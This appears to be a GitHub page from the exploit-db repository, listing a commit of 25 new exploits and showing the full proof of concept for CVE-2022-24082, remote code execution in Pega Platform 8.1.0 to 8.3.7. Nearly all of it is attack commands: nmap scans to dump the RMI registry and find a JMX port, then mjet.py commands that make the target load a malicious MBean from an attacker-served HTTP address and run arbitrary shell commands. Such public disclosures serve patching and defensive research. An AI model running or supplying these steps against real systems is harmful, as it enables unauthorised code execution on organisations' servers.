6bc7a6f9b0
25 changes to exploits/shellcodes/ghdb ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access ZKTeco ZEM/ZMM 8.88 - Missing Authentication Hashicorp Consul v1.0 - Remote Command Execution (RCE) X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) OPSWAT Metadefender Core - Privilege Escalation Pega Platform 8.1.0 - Remote Code Execution (RCE) Beauty-salon v1.0 - Remote Code Execution (RCE) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) iBooking v1.0.8 - Arbitrary File Upload Jetpack 11.4 - Cross Site Scripting (XSS) Moodle LMS 4.0 - Cross-Site Scripting (XSS) Online shopping system advanced 1.0 - Multiple Vulnerabilities rukovoditel 3.2.1 - Cross-Site Scripting (XSS) Senayan Library Management System v9.5.0 - SQL Injection Social-Share-Buttons v2.2.3 - SQL Injection Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) YouPHPTube<= 7.8 - Multiple Vulnerabilities Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) SuperMailer v11.20 - Buffer overflow DoS Tunnel Interface Driver - Denial of Service VMware Workstation 15 Pro - Denial of Service HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
|
|
# Google Dork: N/A
|
|
# Date: 20 Oct 2022
|
|
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
|
|
# Vendor Homepage: www.pega.com
|
|
# Software Link: Not Available
|
|
# Version: 8.1.0 on-premise and higher, up to 8.3.7
|
|
# Tested on: Red Hat Enterprise 7
|
|
# CVE : CVE-2022-24082
|
|
|
|
;Dumping RMI registry:
|
|
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
|
|
|
|
;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
|
|
:<PORT>)
|
|
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
|
|
dump, but actually listens on the network as well):
|
|
nmap -sT -sV -p <PORT> <IP Address>
|
|
|
|
;Exploitation requires:
|
|
;- JVM
|
|
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
|
|
;- jython
|
|
;Installing mbean for remote code execution
|
|
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
|
|
Address> 9999 install random_password http://<Local IP to Serve Payload
|
|
over HTTP>:6666 6666
|
|
|
|
;Execution of commands id & ifconfig
|
|
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
|
|
Address> 9999 command random_password "id;ifconfig"
|
|
|
|
;More details:
|
|
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
|
|
|
|
|
|
Kind Regards,
|
|
Marcin Wolak |